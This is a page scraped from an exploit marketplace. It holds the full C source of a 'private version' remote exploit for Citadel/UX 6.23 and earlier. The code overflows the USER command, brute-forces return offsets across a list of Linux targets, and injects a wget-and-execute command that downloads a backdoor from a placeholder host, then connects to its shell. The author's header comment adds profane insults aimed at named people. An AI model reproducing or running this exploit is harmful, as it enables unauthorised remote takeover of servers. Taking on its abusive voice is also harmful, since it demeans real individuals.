0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version)
================================================================== Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version) ================================================================== /* Citadel/UX remote exploit By nebunu: pppppppal at yahoo dot com This is the version which contains targets,abuse it kiddies Bruteforce: You only have 4096/4=1024 tries. The magic offset lies about 2048 + or - 4,8,16....256 So practically speaking you have maximum 256 tries. Greetings: DrBIOS,Bagabontu,rebel,R4X and all the friends i have. F goes to: #rosec @ undernet, www rosec info read and laugh lacroix you are a big lamer,a little script kiddie who wants to gain fame on vortex.pulltheplug wargame server.By the way,you pathetic cunt..have you even hacked into a box other than yours? Mad anal fucks goes to all #rosec members,dont forget their moms. My little private message: Sa va bagam pule in gat celor de pe irc.apropo.ro,in special lui shell (nimeni) si toata gasca de cacaciosi de la #rosec Ce tupeu pe voi sa vreti donatii in e-gold..va dau eu donatii in sloboz.. */ #include <stdio.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> /* Place here your own link which contains a backdoor (blackhole.c) which listens on port 12345 */ #define COMMAND "cd /tmp;wget http://your-site-here.com/a;/tmp/a;" #define BUFFER 93 #define CITADEL_PORT 504 #define RETADDR 0xbffff000 #define BACKDOOR_PORT 12345 #define MAXTARGETS 9 struct architecture { char *platform; int syst; }arch[]={ {"Red Hat 7.1 (Seawolf)",0x4006aef0}, {"Red Hat 7.2 (Enigma)",0x4006f664}, {"Red Hat 7.3 (Valhalla)",0x080482d0}, {"SuSE Linux 8.0",0x4006f004}, {"Debian sid unstable release",0x4005f270}, {"Slackware 8.0.0",0x40062870}, {"Slackware 9.0.0",0x40061530}, {"Slackware 9.1.0",0x4006be80}, {"SuSE Linux 8.0",0x4006f004}, }; void shell(int sock) { fd_set fd_read; char buff[1024000], *cmd="cd /;uname -a;id\n"; int n; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); FD_SET(0, &fd_read); send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break; if (FD_ISSET(sock, &fd_read)) { if((n = recv(sock, buff, sizeof(buff), 0)) < 0) { fprintf(stderr, "EOF\n"); exit(2); } if (write(1, buff, n) > 0); } if (FD_ISSET(0, &fd_read)) { if((n = read(0, buff, sizeof(buff))) < 0) { fprintf(stderr, "EOF\n"); exit(2); } if (send(sock, buff, n, 0) < 0) break; } usleep(10); } fprintf(stderr, "Connection lost.\n\n"); exit(0); } int fuck(char *fuck) { struct sockaddr_in addr2; int sock2 = 0; if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { return -1; } addr2.sin_addr.s_addr=inet_addr(fuck); addr2.sin_family = AF_INET; addr2.sin_port = htons(BACKDOOR_PORT); if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) { printf("\n\nExploit failed!\n\n"); return -1; } shell(sock2); close(sock2); return 0; } void exploit(char ip[16],int target,int tryy) { int i,sock,t,len,n; char overflow[500],system[8],ret[8]; char egg[500]; int *pt; int retaddr; struct sockaddr_in addy; retaddr=RETADDR+tryy; memset(overflow,0,500); memset(egg,0,500); memset(ret,0,8); memset(system,0,8); for(i=0;i<(BUFFER-strlen(COMMAND));i++) overflow[i]='/'; strcat(overflow,COMMAND); pt=(int *)system; for(i=0;i<4;i+=4)*pt++=arch[target].syst; strcat(overflow,system); strcat(overflow,"AAAA"); pt=(int *)ret; for(i=0;i<4;i+=4)*pt++=retaddr; strcat(overflow,ret); strcpy(egg,"USER "); strcat(egg,overflow); strcat(egg,"\n"); sock=socket(AF_INET,SOCK_STREAM,0); if(sock==-1) { perror("socket()"); exit(-1); } addy.sin_family=AF_INET; addy.sin_port=htons(CITADEL_PORT); addy.sin_addr.s_addr=inet_addr(ip); t=connect(sock,(struct sockaddr *)&addy,sizeof(struct sockaddr_in)); if(t==-1) { perror("connect()"); exit(-1); } write(sock,egg,strlen(egg)); printf("%s\n",egg); close(sock); } int main(int argc,char **argv) { int i,targ; if(argc!=4) { printf("\r\nCitadel/UX remote exploit (private version) by nebunu <pppppppal at yahoo dot com>\r\n Usage: %s <target ip> <target number> <offset [1..4096]>\r\n",argv[0]); printf("\nAvailable targets:\n"); for(i=0;i<MAXTARGETS;i++)printf("\n%u) Platform %s,system=0x%x",i,arch[i].platform,arch[i].syst); printf("\n"); exit(-1); } if(strlen(COMMAND)>92) { printf("\r\nCommand string too large\r\n"); exit(-1); } targ=atoi(argv[2]); printf("\r\nAttacking %s\n",arch[targ].platform); exploit(argv[1],targ,atoi(argv[3])); fuck(argv[1]); } # 0day.today [2024-12-27] #